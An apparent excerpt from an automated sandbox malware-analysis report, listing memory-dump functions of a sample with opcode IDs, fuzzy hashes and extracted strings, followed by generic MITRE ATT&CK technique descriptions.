Instruction Fuzzy Hash: 15C08C04F1BC3F00B800392E1CF20ECAA006BC7610FD08132C30CD00C29C4D60C52166

Function 00007FFD34A61DBB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ca924ace70df0b884855a18e32bba2dd2b934f3daca8841a9865570b0a45c21
Instruction ID: d972519a7d759b30169aacb512aa918e3a71852dc9d9a44378e9a863678ef63e
Opcode Fuzzy Hash: 1ca924ace70df0b884855a18e32bba2dd2b934f3daca8841a9865570b0a45c21
Instruction Fuzzy Hash: D5D09220F0D55385F668460280B067A69945F43329F70483FC2DFC18C18E2C74027702

Function 00007FFD34A6AEFB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 607c3bbb7082d90f7934c627a1acdeeb8e66a647cf49131bae9bc1802bc13f78
Instruction ID: 41bfbf4eb9ced4911771422ed3ecb4abff17641684ed4fe9f929075e79a401ec
Opcode Fuzzy Hash: 607c3bbb7082d90f7934c627a1acdeeb8e66a647cf49131bae9bc1802bc13f78
Instruction Fuzzy Hash: 35D0C9A0B1E56385F1784A0181F123D65E0CF43329E30003ED2AFC18C5CD2C79417A12

Function 00007FFD34A6DA95 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction ID: dbbb596e676321b3cf65092bc62f015eefd553c902a8c144a0d473cf18fd25f4
Opcode Fuzzy Hash: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction Fuzzy Hash: 2BC04C303048149FD7C4DE4DC0D463877D1EF4A311B5000B4E14ACB6A6C52C9C45A710

Function 00007FFD346712B8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e324092602b3f72e1152b057234d25b009204692493c25fb805eddb0f9527d50
Instruction ID: 05d28cda9628e24156d518c235452a3abd5fff98047e8328ccf053225ffc3910
Opcode Fuzzy Hash: e324092602b3f72e1152b057234d25b009204692493c25fb805eddb0f9527d50
Instruction Fuzzy Hash: 0FB09210A6682A06D448FAB58CE60E4BA50EB4A244FD681B4D60DC1282E94F29EBA249

Function 00007FFD34A699AC Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97b5b4b87c2dba977795931ca0690acf225cd92460997749b6571d8fab43f2d0
Instruction ID: 4b78336690347b4555c33fb94c438e107b922cdebea75a9e9cf3cba739645008
Opcode Fuzzy Hash: 97b5b4b87c2dba977795931ca0690acf225cd92460997749b6571d8fab43f2d0
Instruction Fuzzy Hash: 5AC04C7070C405CFE690DB18C194A2936A1EF06314B7140B4E11ACB1B5DA2DEC41AB00

Function 00007FFD34A612DF Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdd883357df6c0f46976562c5cefe8407d90853fc75f5b7e721bfd0adb88b961
Instruction ID: 3c1769f234c28cc640de5463e596339fe53e92c8aaac9160041283970efbdea4
Opcode Fuzzy Hash: bdd883357df6c0f46976562c5cefe8407d90853fc75f5b7e721bfd0adb88b961
Instruction Fuzzy Hash: 75C09290F0E3D35FFB2129B408F50BD0A800F57669BA90572D78ACE2CBEC5CA80576E1

Function 00007FFD34A6085C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97b5b4b87c2dba977795931ca0690acf225cd92460997749b6571d8fab43f2d0
Instruction ID: 5451be1488a4f4fc7e6239ff8f1f482d9dd466962446f6af68922486102aa260
Opcode Fuzzy Hash: 97b5b4b87c2dba977795931ca0690acf225cd92460997749b6571d8fab43f2d0
Instruction Fuzzy Hash: 16C04C7071C415CFE690DB18C194A2937A0FF05314B7500B4E24DCB2B1DB2CEC41B740

Function 00007FFD346706C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
Instruction ID: 5f50ccebf77bd3794ae4a60fb9f63b7008a0ba5f9e4f566bca35b453b308a4e9
Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
Instruction Fuzzy Hash: A8B01204D6781F00A404357A0CD20E4B8405B46104FC05070D60CC00C2984D10D42252

Non-executed Functions

Function 00007FFD346709B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FFD34670B56
#{9, xrefs: 00007FFD34670B3E
!k9, xrefs: 00007FFD34670B4E
"s9, xrefs: 00007FFD34670B46

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 0fb289fb47a5deec7ef168d895a6a25b6b9d2bdf2d5240c6b2077d5b116f313d
Instruction ID: a734eb8e83ac71641db9f3c6cc869b341831270852cb1dbd128eb95d7a6ec3bc
Opcode Fuzzy Hash: 0fb289fb47a5deec7ef168d895a6a25b6b9d2bdf2d5240c6b2077d5b116f313d
Instruction Fuzzy Hash: AB414017B9C67246E12237FDB4611FFAB889FE127EB488677E1CCD90C38D08648586E5

Analysis Process: fvXBwqYdGYPkplbuTcoXecCdP.exePID: 8996, Parent PID: 7820COMMON

Executed Functions

Function 00007FFD34680D48 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

5Y_H, xrefs: 00007FFD34680DF3

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID: 5Y_H
API String ID: 0-3237497481
Opcode ID: 64d1364fe24eca6f765dcc74dd61bc81de44704bba52a7747f86a5a01ccfb9e2
Instruction ID: a6c2f5325bf5f2e0030e1b510019d5b0a06c3528b271ea88b4b823696220af39
Opcode Fuzzy Hash: 64d1364fe24eca6f765dcc74dd61bc81de44704bba52a7747f86a5a01ccfb9e2
Instruction Fuzzy Hash: B791F276A09B9A8FE799DB68C8693A97FE1FF66310F0501AFC049D73E2DA791411C700

Function 00007FFD34680E43 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c47ee99d5252679eaa3071752b2bd08c42027bf8d6de930ff6dcaadde3cbef0f
Instruction ID: 403c49041456fc03e2355b25ad9d78063c5d95f848c9733f2194ef2fa212b4f4
Opcode Fuzzy Hash: c47ee99d5252679eaa3071752b2bd08c42027bf8d6de930ff6dcaadde3cbef0f
Instruction Fuzzy Hash: 4E51BF76B18B5E8AE7988F5CC8697E97FD5FB96325F4102AEC049D33D1CA791421C700

Function 00007FFD34680998 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

@4s4, xrefs: 00007FFD3468B035

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID: @4s4
API String ID: 0-3163821293
Opcode ID: c56e77566906328d607ed9bddc7ff2c04549afca43f653bfc8954a6ab9b3e0cc
Instruction ID: 1205e9c09a0aa9ed73e490ce17130863bb2d062ba29100f96045c75211269951
Opcode Fuzzy Hash: c56e77566906328d607ed9bddc7ff2c04549afca43f653bfc8954a6ab9b3e0cc
Instruction Fuzzy Hash: 0D21D320B18A2A0FF798BB6CD4696B573D6EB99311F1100BDE51DC33D3DD28AC418281

Function 00007FFD34680908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd09c376caa99ecaeec8454059c6ebc7a4fe30a76283cee91b194be6247da6b
Instruction ID: e3e17ea6dfe491c4d697775917054a70140ce5954e307c36e2d60d480d1983c3
Opcode Fuzzy Hash: 2cd09c376caa99ecaeec8454059c6ebc7a4fe30a76283cee91b194be6247da6b
Instruction Fuzzy Hash: 6E21EA3130CC184FD7A8EA1CE889DB977D1EF5A32170511BAE58EC7125E911EC8287C2

Function 00007FFD34680C25 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50a64416edbe275deaf182fd19c2600ac86d9028f58e3166396ea3e7625d0d91
Instruction ID: f07050602c5cc1c452a5634482d78da5381c3ffecc0df385ef8cbbb186b88607
Opcode Fuzzy Hash: 50a64416edbe275deaf182fd19c2600ac86d9028f58e3166396ea3e7625d0d91
Instruction Fuzzy Hash: 62214B76B0DB998FE7129F6898A10ED7B60EF93325F0546B3D148CA183DD3C25069781

Function 00007FFD346808F8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53add752f6c31b0ee3e893d005053132a81d5b3208b78c74198c8bd131a2d44b
Instruction ID: a0dab2b6c5f1a8376bb0d8daa295fcc0eeb44f809eac761741b94049a7cdb926
Opcode Fuzzy Hash: 53add752f6c31b0ee3e893d005053132a81d5b3208b78c74198c8bd131a2d44b
Instruction Fuzzy Hash: D501F732B0D93D0B5AA8D51DD89A979B3D2DBCBB307151279D98EC3245DC14BC5342C1

Function 00007FFD34680C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9fea1406810f1e9b23c755ccfb29c7fbcdd32518afc9d4491ab5de315d26591
Instruction ID: fd54f09a4e466ee793075daf3490f0fab750933ddb3a6cfe4c31e6d1ad240a8e
Opcode Fuzzy Hash: d9fea1406810f1e9b23c755ccfb29c7fbcdd32518afc9d4491ab5de315d26591
Instruction Fuzzy Hash: 6511E075B0EB9D8FEB529F2888A10ED7BB0EF63311F1649F6C244DB182D93C65069780

Function 00007FFD3468108D Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f713fb9d7427a692960b0e08e6d60831691ec52531609b60235d7a0d8d4aa717
Instruction ID: cc1156b1c8bc7e31a8a1b1a97fc70e4f867143fc40c9b4672b49c1df4d26cf13
Opcode Fuzzy Hash: f713fb9d7427a692960b0e08e6d60831691ec52531609b60235d7a0d8d4aa717
Instruction Fuzzy Hash: AD01D621A8E6E20FE76A96B09CB15E17FE5CF8721070901FED1C9CB1A3CC4D58868351

Function 00007FFD34680C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96ed0e62ce2c90e8a7b0d56708467c39bbce42824869a43e3c3ada27ea4ff556
Instruction ID: 993f8d73d99fd8be74aa4c72544eac2ce8811e272f6699b252a73554acd69bc4
Opcode Fuzzy Hash: 96ed0e62ce2c90e8a7b0d56708467c39bbce42824869a43e3c3ada27ea4ff556
Instruction Fuzzy Hash: 6311E175B0EB998FEB52DF2488A10ED7BB0EF63310F1649F6C144DB182D93C65059B80

Function 00007FFD34685AAE Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fbbe1e68e50fc3bd0469890d0a716cc1768219971df738a1b6be4ecc090fed1
Instruction ID: 00b53177b3377c135efa3dac405ccf07c79cbe8946bb013d8d73ccc4a55b8285
Opcode Fuzzy Hash: 0fbbe1e68e50fc3bd0469890d0a716cc1768219971df738a1b6be4ecc090fed1
Instruction Fuzzy Hash: CF11EF30A485198FDBD4DF14C4E4BE973F1EB98301F5441AAD10ED7290CA38AA81CB40

Function 00007FFD346847EE Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f739a6f16d76d45250984705e8e8e253c8b9385c673156c8da7296e795cf75
Instruction ID: ac78b399756facaf2127421e19a103b5b6bb3f1c7f66202ad5981a86ebd7ce0e
Opcode Fuzzy Hash: c5f739a6f16d76d45250984705e8e8e253c8b9385c673156c8da7296e795cf75
Instruction Fuzzy Hash: 1C014B60B08A2A4BFFD4FE24C4E4AF833D6EF96300F164475D64AD7292ED2CAC41A700

Function 00007FFD34680C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e86da37f2f3264a651337020c91039d4d29a2240bb6a83cf391e6b8f3479be
Instruction ID: 3c2f76956ced3907a822842776d1f10e94d00bbfea3c630457652cd3f3ebea0e
Opcode Fuzzy Hash: a2e86da37f2f3264a651337020c91039d4d29a2240bb6a83cf391e6b8f3479be
Instruction Fuzzy Hash: 82010C71A0EB888FEB52DF2488A00ED7BB0EF63300F1604F6C140DB182DA3C6A059B80

Function 00007FFD346847CE Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82eeabdc241c2a62e162ccc7baaae792d61322c8d9fdb1b0411a8c788efce62b
Instruction ID: 63c50cc0f693aee90f4a085defc5c8f32f0479498e97e39d0d438a581fce6033
Opcode Fuzzy Hash: 82eeabdc241c2a62e162ccc7baaae792d61322c8d9fdb1b0411a8c788efce62b
Instruction Fuzzy Hash: 21014F60F19A3E4BEBE0EE1884E47F863A1FF1A300F5109B5D54DE3292ED2C6C809711

Function 00007FFD34680C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed42c695cf665066dc806c760cc140d6376c3f7bc4c901c80fcb813c3fe9e43c
Instruction ID: f91167166386470f0693f069ca24bc513cf5f86a6aefe62a257adfb18e71e485
Opcode Fuzzy Hash: ed42c695cf665066dc806c760cc140d6376c3f7bc4c901c80fcb813c3fe9e43c
Instruction Fuzzy Hash: 2D01BC74E0EB999FEB52DF6488A00ED7FB0EF63300F1505E6C144DB182D93C6A449741

Function 00007FFD346810C0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9057086b1c1e4862696eb4bf09763a07ebd928a5571024cbf416280da337d409
Instruction ID: 9b436d9c232174391a7c2e2baad7af11cc88c44d1945492170e3e650b4046975
Opcode Fuzzy Hash: 9057086b1c1e4862696eb4bf09763a07ebd928a5571024cbf416280da337d409
Instruction Fuzzy Hash: 21E02621B4CC590AEBBCA5B4A8B21F47380DB46315B0501BED14AC2286CC5D5C814280

Function 00007FFD3468480B Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2288c99eab7b3ce79b0c5988de62a37b3f12b0a73a0bcbac6919596a7fbac341
Instruction ID: 21ff1640cd920940dccab1ec99a0bd2213e914c10ab10dd268dc34695dee867a
Opcode Fuzzy Hash: 2288c99eab7b3ce79b0c5988de62a37b3f12b0a73a0bcbac6919596a7fbac341
Instruction Fuzzy Hash: FBF0AC30E58A3E8BEBD4AE50C8E47F863A1BF16305F0005B9C24DE7191DE6C2D81EA10

Function 00007FFD34686DE8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe0b75d08b9c301d64e052730cfc3b5d421e3e3e28d73b2336f9e0da07ec4312
Instruction ID: 25d235d573fff8f7f45072f46b7f30d3adfd92cf47855bb022b5513b40cbb084
Opcode Fuzzy Hash: fe0b75d08b9c301d64e052730cfc3b5d421e3e3e28d73b2336f9e0da07ec4312
Instruction Fuzzy Hash: F9E06D24B081664BFB905A44C8B03ED2321FF85300F259879DB4EE73C1CD2C9D82A751

Function 00007FFD346848AE Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83accb6ea45df16bc0cc82df944b8a2b1f38f4474f06db1afa9d6c8db19a8251
Instruction ID: e786962933070cccdf3a4f2f73b6b62dac1fa960f077b7add2521c976499bde3
Opcode Fuzzy Hash: 83accb6ea45df16bc0cc82df944b8a2b1f38f4474f06db1afa9d6c8db19a8251
Instruction Fuzzy Hash: 36E0B620B18A7A4BFBE0EE14C5E47F82391AF47300F1005B5CA9DE32D2DD2D6D81AA21

Function 00007FFD34680B9D Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
Instruction ID: c26d6cd44d2363c31f495cac6a99d813bdd4ccd5d49846c43e175ea757afe9fc
Opcode Fuzzy Hash: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
Instruction Fuzzy Hash: 2EC0123062880E8FDA80BB28C888828BBA0FB0F315BD914E0E00CCB1A1D61998908702

Function 00007FFD346806A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
Instruction ID: 217a17b160e11e56d048f8bd369486d016bfe5ae4db63909427fd0842caab3bf
Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
Instruction Fuzzy Hash: EEC08C05F0BE3F00B880392E18E20ECA3005FC7610FE30832D30CD00C19C0D20C62146

Function 00007FFD346812B8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e324092602b3f72e1152b057234d25b009204692493c25fb805eddb0f9527d50
Instruction ID: 4ca9ee4ab12d342c16065cd6a28b75e39869857b571f01a68e56ba77f89b2abb
Opcode Fuzzy Hash: e324092602b3f72e1152b057234d25b009204692493c25fb805eddb0f9527d50
Instruction Fuzzy Hash: 6EB09210A6A82A06D888FAB58CE20E4B250EB4A354FD640B4D90DC1182E94E29D7A249

Function 00007FFD346806C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
Instruction ID: 4e7bba5bb7288390cc2f20b293250f8cac366fe5377c7eab29166c267286a2f3
Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
Instruction Fuzzy Hash: E7B01204D5781F00A884357A08D20E471405F46100FC21070E61CC0081984D10952242

Non-executed Functions

Function 00007FFD346809B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FFD34680B56
"s9, xrefs: 00007FFD34680B46
#{9, xrefs: 00007FFD34680B3E
!k9, xrefs: 00007FFD34680B4E

Memory Dump Source

Source File: 0000004B.00000002.3639809820.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_75_2_7ffd34680000_fvXBwqYdGYPkplbuTcoXecCdP.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 957b9086afa00c150c7409c81830facba179133c026cfe0373082261511526f0
Instruction ID: 80a8c22c89b712c28367d7143927f34a63d904814a7e65e69a709a07e36fa7c3
Opcode Fuzzy Hash: 957b9086afa00c150c7409c81830facba179133c026cfe0373082261511526f0
Instruction Fuzzy Hash: 6D417F07B8D66A45E22137FDB4621FF6B889FE233EB084777E18C990C38D09608586E5

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
